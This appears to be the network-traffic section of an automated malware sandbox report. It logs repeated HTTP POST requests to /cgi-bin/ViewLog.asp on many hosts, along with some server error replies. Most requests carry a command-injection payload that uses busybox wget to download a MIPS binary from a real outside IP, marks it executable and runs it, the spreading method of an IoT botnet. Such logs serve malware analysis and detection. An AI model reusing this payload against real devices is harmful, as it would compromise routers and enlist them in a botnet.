                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              572192.168.2.134188231.173.123.508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.843944073 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:51.208892107 CET530INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 09:17:50 GMT
                                              Server: Webs
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              X-XSS-Protection: 1;mode=block
                                              Cache-Control: no-store
                                              Content-Length: 166
                                              Content-Type: text/html
                                              Connection: keep-alive
                                              Keep-Alive: timeout=60, max=99
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              573192.168.2.135804831.182.116.1358080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.929810047 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              574192.168.2.133508094.122.65.1388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:50.959572077 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              575192.168.2.133820094.72.88.1078080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:51.067338943 CET194INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html;charset=UTF-8
                                              Content-Length: 0
                                              Connection: close
                                              Cache-control: no-cache


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              576192.168.2.134594285.152.234.2148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:51.094239950 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              577192.168.2.135780462.224.192.2418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:51.124191046 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:52.105366945 CET113INHTTP/1.1 400 Bad Request
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              578192.168.2.133542094.23.144.2128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:51.323066950 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:51.504118919 CET374INHTTP/1.1 404 Not Found
                                              Server: nginx/1.21.6
                                              Date: Thu, 23 Nov 2023 04:17:51 GMT
                                              Content-Type: text/html
                                              Content-Length: 153
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.21.6</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              579192.168.2.133602462.29.9.1218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:51.373037100 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.494211912 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              580192.168.2.134468862.29.34.1648080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:51.373075008 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.494218111 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              581192.168.2.133620862.212.239.378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:51.401807070 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:51.675234079 CET505INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:17:51 GMT
                                              Server: Apache/2.4.41 (Ubuntu) mod_fcgid/2.3.9 OpenSSL/1.1.1f
                                              Content-Length: 226
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              582192.168.2.135795485.69.31.328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:51.518260002 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:52.134294987 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.318243027 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.750232935 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:00.614197969 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.086203098 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              583192.168.2.134342494.121.149.448080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:51.640326977 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:52.870223045 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:54.310257912 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:57.286216021 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:03.174211025 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
